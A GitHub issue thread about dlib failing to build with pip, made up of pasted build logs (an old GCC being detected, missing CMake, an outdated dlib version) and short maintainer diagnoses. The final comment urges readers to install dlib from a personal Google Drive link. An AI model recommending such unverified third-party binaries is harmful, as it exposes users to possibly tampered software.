### ISSUE TITLE
pip dlib not installing

### ISSUE THREAD

**Issue by prodemmi** [davisking/dlib#2596]
Hi, when I try to install dlib with pip, I got an error in the gcc version, but the latest gcc version is installed.
## Expected Behavior
Since cmake and gcc are installed, the dlib package must be installed properly.

## Current Behavior
Collecting dlib
  Using cached dlib-19.24.0.tar.gz (3.2 MB)
  Preparing metadata (setup.py) ... done
Building wheels for collected packages: dlib
  Building wheel for dlib (setup.py) ... error
  error: subprocess-exited-with-error
  
  × python setup.py bdist_wheel did not run successfully.
  │ exit code: 1
  ╰─> [77 lines of output]
      running bdist_wheel
      running build
      running build_py
      package init file 'tools/python/dlib/__init__.py' not found (or not a regular file)
      running build_ext
      Building extension for Python 3.8.12 (default, Jun  6 2022, 21:30:31)
      Invoking CMake setup: 'cmake /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/tools/python -DCMAKE_LIBRARY_OUTPUT_DIRECTORY=/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/build/lib.linux-x86_64-3.8 -DPYTHON_EXECUTABLE=/home/axsut/DFDNet/DFDNet/env/bin/python -DCMAKE_BUILD_TYPE=Release'
      -- The C compiler identification is GNU 4.8.5
      -- The CXX compiler identification is GNU 4.8.5
      -- Detecting C compiler ABI info
      -- Detecting C compiler ABI info - done
      -- Check for working C compiler: /usr/bin/cc - skipped
      -- Detecting C compile features
      -- Detecting C compile features - done
      -- Detecting CXX compiler ABI info
      -- Detecting CXX compiler ABI info - done
      -- Check for working CXX compiler: /usr/bin/c++ - skipped
      -- Detecting CXX compile features
      -- Detecting CXX compile features - done
      -- Found PythonInterp: /home/axsut/DFDNet/DFDNet/env/bin/python (found version "3.8.12")
      -- Found PythonLibs: /usr/local/lib/libpython3.8.a
      -- Performing Test HAS_CPP14_FLAG
      -- Performing Test HAS_CPP14_FLAG - Failed
      -- Performing Test HAS_CPP11_FLAG
      -- Performing Test HAS_CPP11_FLAG - Success
      -- pybind11 v2.2.4
      -- Using CMake version: 3.22.4
      -- Compiling dlib version: 19.24.0
      CMake Error at /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/cmake_utils/set_compiler_specific_options.cmake:50 (message):
        C++11 is required to use dlib, but the version of GCC you are using is too
        old and doesn't support C++11.  You need GCC 4.9 or newer.
      Call Stack (most recent call first):
        /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/cmake_utils/test_for_sse4/CMakeLists.txt:8 (include)
      
      
      CMake Error at /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/cmake_utils/check_if_sse4_instructions_executable_on_host.cmake:13 (try_compile):
        Failed to configure test project build system.
      Call Stack (most recent call first):
        /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/cmake_utils/set_compiler_specific_options.cmake:13 (include)
        /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/CMakeLists.txt:33 (include)
      
      
      -- Configuring incomplete, errors occurred!
      See also "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/build/temp.linux-x86_64-3.8/CMakeFiles/CMakeOutput.log".
      See also "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/build/temp.linux-x86_64-3.8/CMakeFiles/CMakeError.log".
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/setup.py", line 222, in <module>
          setup(
        File "/home/axsut/DFDNet/DFDNet/env/lib/python3.8/site-packages/setuptools/__init__.py", line 153, in setup
          return distutils.core.setup(**attrs)
        File "/usr/local/lib/python3.8/distutils/core.py", line 148, in setup
          dist.run_commands()
        File "/usr/local/lib/python3.8/distutils/dist.py", line 966, in run_commands
          self.run_command(cmd)
        File "/usr/local/lib/python3.8/distutils/dist.py", line 985, in run_command
          cmd_obj.run()
        File "/home/axsut/DFDNet/DFDNet/env/lib/python3.8/site-packages/wheel/bdist_wheel.py", line 299, in run
          self.run_command('build')
        File "/usr/local/lib/python3.8/distutils/cmd.py", line 313, in run_command
          self.distribution.run_command(command)
        File "/usr/local/lib/python3.8/distutils/dist.py", line 985, in run_command
          cmd_obj.run()
        File "/usr/local/lib/python3.8/distutils/command/build.py", line 135, in run
          self.run_command(cmd_name)
        File "/usr/local/lib/python3.8/distutils/cmd.py", line 313, in run_command
          self.distribution.run_command(command)
        File "/usr/local/lib/python3.8/distutils/dist.py", line 985, in run_command
          cmd_obj.run()
        File "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/setup.py", line 134, in run
          self.build_extension(ext)
        File "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/setup.py", line 171, in build_extension
          subprocess.check_call(cmake_setup, cwd=build_folder)
        File "/usr/local/lib/python3.8/subprocess.py", line 364, in check_call
          raise CalledProcessError(retcode, cmd)
      subprocess.CalledProcessError: Command '['cmake', '/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/tools/python', '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/build/lib.linux-x86_64-3.8', '-DPYTHON_EXECUTABLE=/home/axsut/DFDNet/DFDNet/env/bin/python', '-DCMAKE_BUILD_TYPE=Release']' returned non-zero exit status 1.
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for dlib
  Running setup.py clean for dlib
Failed to build dlib
Installing collected packages: dlib
  Running setup.py install for dlib ... error
  error: subprocess-exited-with-error
  
  × Running setup.py install for dlib did not run successfully.
  │ exit code: 1
  ╰─> [79 lines of output]
      running install
      running build
      running build_py
      package init file 'tools/python/dlib/__init__.py' not found (or not a regular file)
      running build_ext
      Building extension for Python 3.8.12 (default, Jun  6 2022, 21:30:31)
      Invoking CMake setup: 'cmake /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/tools/python -DCMAKE_LIBRARY_OUTPUT_DIRECTORY=/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/build/lib.linux-x86_64-3.8 -DPYTHON_EXECUTABLE=/home/axsut/DFDNet/DFDNet/env/bin/python -DCMAKE_BUILD_TYPE=Release'
      -- The C compiler identification is GNU 4.8.5
      -- The CXX compiler identification is GNU 4.8.5
      -- Detecting C compiler ABI info
      -- Detecting C compiler ABI info - done
      -- Check for working C compiler: /usr/bin/cc - skipped
      -- Detecting C compile features
      -- Detecting C compile features - done
      -- Detecting CXX compiler ABI info
      -- Detecting CXX compiler ABI info - done
      -- Check for working CXX compiler: /usr/bin/c++ - skipped
      -- Detecting CXX compile features
      -- Detecting CXX compile features - done
      -- Found PythonInterp: /home/axsut/DFDNet/DFDNet/env/bin/python (found version "3.8.12")
      -- Found PythonLibs: /usr/local/lib/libpython3.8.a
      -- Performing Test HAS_CPP14_FLAG
      -- Performing Test HAS_CPP14_FLAG - Failed
      -- Performing Test HAS_CPP11_FLAG
      -- Performing Test HAS_CPP11_FLAG - Success
      -- pybind11 v2.2.4
      -- Using CMake version: 3.22.4
      -- Compiling dlib version: 19.24.0
      CMake Error at /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/cmake_utils/set_compiler_specific_options.cmake:50 (message):
        C++11 is required to use dlib, but the version of GCC you are using is too
        old and doesn't support C++11.  You need GCC 4.9 or newer.
      Call Stack (most recent call first):
        /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/cmake_utils/test_for_sse4/CMakeLists.txt:8 (include)
      
      
      CMake Error at /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/cmake_utils/check_if_sse4_instructions_executable_on_host.cmake:13 (try_compile):
        Failed to configure test project build system.
      Call Stack (most recent call first):
        /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/cmake_utils/set_compiler_specific_options.cmake:13 (include)
        /tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/dlib/CMakeLists.txt:33 (include)
      
      
      -- Configuring incomplete, errors occurred!
      See also "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/build/temp.linux-x86_64-3.8/CMakeFiles/CMakeOutput.log".
      See also "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/build/temp.linux-x86_64-3.8/CMakeFiles/CMakeError.log".
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/setup.py", line 222, in <module>
          setup(
        File "/home/axsut/DFDNet/DFDNet/env/lib/python3.8/site-packages/setuptools/__init__.py", line 153, in setup
          return distutils.core.setup(**attrs)
        File "/usr/local/lib/python3.8/distutils/core.py", line 148, in setup
          dist.run_commands()
        File "/usr/local/lib/python3.8/distutils/dist.py", line 966, in run_commands
          self.run_command(cmd)
        File "/usr/local/lib/python3.8/distutils/dist.py", line 985, in run_command
          cmd_obj.run()
        File "/home/axsut/DFDNet/DFDNet/env/lib/python3.8/site-packages/setuptools/command/install.py", line 61, in run
          return orig.install.run(self)
        File "/usr/local/lib/python3.8/distutils/command/install.py", line 545, in run
          self.run_command('build')
        File "/usr/local/lib/python3.8/distutils/cmd.py", line 313, in run_command
          self.distribution.run_command(command)
        File "/usr/local/lib/python3.8/distutils/dist.py", line 985, in run_command
          cmd_obj.run()
        File "/usr/local/lib/python3.8/distutils/command/build.py", line 135, in run
          self.run_command(cmd_name)
        File "/usr/local/lib/python3.8/distutils/cmd.py", line 313, in run_command
          self.distribution.run_command(command)
        File "/usr/local/lib/python3.8/distutils/dist.py", line 985, in run_command
          cmd_obj.run()
        File "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/setup.py", line 134, in run
          self.build_extension(ext)
        File "/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/setup.py", line 171, in build_extension
          subprocess.check_call(cmake_setup, cwd=build_folder)
        File "/usr/local/lib/python3.8/subprocess.py", line 364, in check_call
          raise CalledProcessError(retcode, cmd)
      subprocess.CalledProcessError: Command '['cmake', '/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/tools/python', '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=/tmp/pip-install-hoifmbg8/dlib_2abceb3d874b4ae4bdd246d44369a9ed/build/lib.linux-x86_64-3.8', '-DPYTHON_EXECUTABLE=/home/axsut/DFDNet/DFDNet/env/bin/python', '-DCMAKE_BUILD_TYPE=Release']' returned non-zero exit status 1.
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> dlib

note: This is an issue with the package mentioned above, not pip.
hint: See above for output from the failure.

## Steps to Reproduce
pip install dlib

Platform: Centos 7.9.2009
Cmake version: 3.22.4
GCC verrsion: 9.2.0

**Comment by davisking** [comment]
Not sure what to say.  The output you pasted says you are using GNU 4.8.5,
which is super old.

**Comment by davisking** [comment]
Like what does `g++ --version` say when you type it in a terminal?

**Comment by prodemmi** [comment]
> Like what does `g++ --version` say when you type it in a terminal?

Hi, this is the output:
[root@server ~]# g++ --version
g++ (GCC) 9.2.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

**Comment by Naresh1436** [comment]
Collecting dlib
  Using cached dlib-19.24.0.tar.gz (3.2 MB)
  Preparing metadata (setup.py): started
  Preparing metadata (setup.py): finished with status 'done'
Building wheels for collected packages: dlib
  Building wheel for dlib (setup.py): started
  Building wheel for dlib (setup.py): finished with status 'error'
  Running setup.py clean for dlib
Failed to build dlib
Installing collected packages: dlib
  Running setup.py install for dlib: started
  Running setup.py install for dlib: finished with status 'error'

  error: subprocess-exited-with-error
  
  × python setup.py bdist_wheel did not run successfully.
  │ exit code: 1
  ╰─> [10 lines of output]
      running bdist_wheel
      running build
      running build_py
      package init file 'tools/python/dlib/__init__.py' not found (or not a regular file)
      warning: build_py: byte-compiling is disabled, skipping.
      
      running build_ext
      
      ERROR: CMake must be installed to build dlib
      
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for dlib
  error: subprocess-exited-with-error
  
  × Running setup.py install for dlib did not run successfully.
  │ exit code: 1
  ╰─> [12 lines of output]
      running install
      /usr/lib/python3/dist-packages/setuptools/command/install.py:34: SetuptoolsDeprecationWarning: setup.py install is deprecated. Use build and pip and other standards-based tools.
        warnings.warn(
      running build
      running build_py
      package init file 'tools/python/dlib/__init__.py' not found (or not a regular file)
      warning: build_py: byte-compiling is disabled, skipping.
      
      running build_ext
      
      ERROR: CMake must be installed to build dlib
      
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> dlib

note: This is an issue with the package mentioned above, not pip.
hint: See above for output from the failure.

**Comment by davisking** [comment]
`ERROR: CMake must be installed to build dlib`.

You have to install CMake :)   Get it from cmake.org.

**Comment by vaxobovavazbek** [comment]
Collecting dlib==19.4
  Downloading dlib-19.4.0.tar.gz (4.0 MB)
     ---------------------------------------- 4.0/4.0 MB 595.8 kB/s eta 0:00:00
  Preparing metadata (setup.py) ... done
Building wheels for collected packages: dlib
  Building wheel for dlib (setup.py) ... error
  error: subprocess-exited-with-error

  × python setup.py bdist_wheel did not run successfully.
  │ exit code: 1
  ╰─> [39 lines of output]
      running bdist_wheel
      running build
      Detected Python architecture: 64bit
      Detected platform: win32
      Configuring cmake ...
      C:\Program Files\Python310\lib\subprocess.py:959: RuntimeWarning: line buffering (buffering=1) isn't supported in binary mode, the default buffer size will be used
        self.stdout = io.open(c2pread, 'rb', bufsize)
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "C:\Users\HP\AppData\Local\Temp\pip-install-c08tomm3\dlib_e9ee89625c5f489db3a055aad39ae254\setup.py", line 607, in <module>
          setup(
        File "C:\Program Files\Python310\lib\site-packages\setuptools\__init__.py", line 87, in setup
          return distutils.core.setup(**attrs)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\core.py", line 177, in setup
          return run_commands(dist)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\core.py", line 193, in run_commands
          dist.run_commands()
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\dist.py", line 968, in run_commands
          self.run_command(cmd)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\dist.py", line 1217, in run_command
          super().run_command(command)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\dist.py", line 987, in run_command
          cmd_obj.run()
        File "C:\Program Files\Python310\lib\site-packages\wheel\bdist_wheel.py", line 325, in run
          self.run_command("build")
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\cmd.py", line 317, in run_command
          self.distribution.run_command(command)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\dist.py", line 1217, in run_command
          super().run_command(command)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\dist.py", line 987, in run_command
          cmd_obj.run()
        File "C:\Users\HP\AppData\Local\Temp\pip-install-c08tomm3\dlib_e9ee89625c5f489db3a055aad39ae254\setup.py", line 405, in run
          self.build_dlib()
        File "C:\Users\HP\AppData\Local\Temp\pip-install-c08tomm3\dlib_e9ee89625c5f489db3a055aad39ae254\setup.py", line 558, in build_dlib
          if run_process(cmake_cmd):
        File "C:\Users\HP\AppData\Local\Temp\pip-install-c08tomm3\dlib_e9ee89625c5f489db3a055aad39ae254\setup.py", line 298, in run_process
          while t.isAlive():
      AttributeError: 'Thread' object has no attribute 'isAlive'. Did you mean: 'is_alive'?
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for dlib
  Running setup.py clean for dlib
Failed to build dlib
Installing collected packages: dlib
  Running setup.py install for dlib ... error
  error: subprocess-exited-with-error

  × Running setup.py install for dlib did not run successfully.
  │ exit code: 1
  ╰─> [44 lines of output]
      running install
      C:\Program Files\Python310\lib\site-packages\setuptools\command\install.py:34: SetuptoolsDeprecationWarning: setup.py install is deprecated. Use build and pip and other standards-based tools.
        warnings.warn(
      running build
      Detected Python architecture: 64bit
      Detected platform: win32
      Removing build directory C:\Users\HP\AppData\Local\Temp\pip-install-c08tomm3\dlib_e9ee89625c5f489db3a055aad39ae254\./tools/python/build
      Configuring cmake ...
      C:\Program Files\Python310\lib\subprocess.py:959: RuntimeWarning: line buffering (buffering=1) isn't supported in binary mode, the default buffer size will be used
        self.stdout = io.open(c2pread, 'rb', bufsize)
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "C:\Users\HP\AppData\Local\Temp\pip-install-c08tomm3\dlib_e9ee89625c5f489db3a055aad39ae254\setup.py", line 607, in <module>
          setup(
        File "C:\Program Files\Python310\lib\site-packages\setuptools\__init__.py", line 87, in setup
          return distutils.core.setup(**attrs)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\core.py", line 177, in setup
          return run_commands(dist)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\core.py", line 193, in run_commands
          dist.run_commands()
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\dist.py", line 968, in run_commands
          self.run_command(cmd)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\dist.py", line 1217, in run_command
          super().run_command(command)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\dist.py", line 987, in run_command
          cmd_obj.run()
        File "C:\Program Files\Python310\lib\site-packages\setuptools\command\install.py", line 68, in run
          return orig.install.run(self)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\command\install.py", line 695, in run
          self.run_command('build')
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\cmd.py", line 317, in run_command
          self.distribution.run_command(command)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\dist.py", line 1217, in run_command
          super().run_command(command)
        File "C:\Program Files\Python310\lib\site-packages\setuptools\_distutils\dist.py", line 987, in run_command
          cmd_obj.run()
        File "C:\Users\HP\AppData\Local\Temp\pip-install-c08tomm3\dlib_e9ee89625c5f489db3a055aad39ae254\setup.py", line 405, in run
          self.build_dlib()
        File "C:\Users\HP\AppData\Local\Temp\pip-install-c08tomm3\dlib_e9ee89625c5f489db3a055aad39ae254\setup.py", line 558, in build_dlib
          if run_process(cmake_cmd):
        File "C:\Users\HP\AppData\Local\Temp\pip-install-c08tomm3\dlib_e9ee89625c5f489db3a055aad39ae254\setup.py", line 298, in run_process
          while t.isAlive():
      AttributeError: 'Thread' object has no attribute 'isAlive'. Did you mean: 'is_alive'?
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> dlib

note: This is an issue with the package mentioned above, not pip.
hint: See above for output from the failure./



I have amd rayzen 5 4500U CPU. I cannot install dlib why?
I installed Cmake. Cant fix

**Comment by davisking** [comment]
dlib 19.4 is super old.  Use the current version :)

**Comment by rafi-am7** [comment]
> `ERROR: CMake must be installed to build dlib`.
> 
> You have to install CMake :) Get it from cmake.org.

This helps me. Thanks

**Comment by wpmanoj** [comment]
select 14 instead 11

`g++ -std=c++14 -O3 -I.. ../dlib/all/source.cpp -lpthread -lX11 example.cpp`

**Comment by Suchir2004** [comment]
Download the dlib files
Link - https://drive.google.com/file/d/11Hip8-llWEm5GN3_u4ibI09unL7xCw0g/view?usp=drivesdk
And just copy the path of that file and paste it into the terminal.
Stable version is 10 among all files that you have been downloaded from the link

In terminal you just need copy the path of that particular file; there are 4 files the choose one which is suitable for your computer work on windows.
